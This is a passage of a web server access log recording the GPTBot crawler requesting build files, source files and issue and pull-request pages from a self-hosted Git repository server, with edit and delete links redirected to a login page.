(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:20:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:20:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:18:20:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:20:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12029] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:18:20:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=latest&state=closed&type=all" -[17/Feb/2026:18:20:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:20:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:18:20:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:20:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:18:20:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:20:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:20:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:20:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" -[17/Feb/2026:18:20:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19135] [Gzip 6.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build" -[17/Feb/2026:18:20:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.hpp?display=source" [Client 74.7.227.38] [Length 13537] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:20:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old-transport.hpp?display=source" [Client 74.7.227.38] [Length 12805] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:20:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.cpp?display=source" [Client 74.7.227.38] [Length 15371] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:20:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:18:20:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:18:20:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:20:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:18:20:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:18:20:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:20:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:20:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:20:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:20:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:20:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:20:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 10106] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:20:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:20:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 25230] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 1479] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:20:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=oldest&state=closed&type=all" -[17/Feb/2026:18:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol.exe?display=rendered" [Client 74.7.227.38] [Length 10887] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol.exe" -[17/Feb/2026:18:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:18:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&state=open&type=all" [Client 74.7.227.38] [Length 9964] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" -[17/Feb/2026:18:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:20:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:20:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10074] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:18:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10255] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:18:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10253] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:18:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:18:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:18:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:18:20:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=rendered" [Client 74.7.227.38] [Length 11775] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 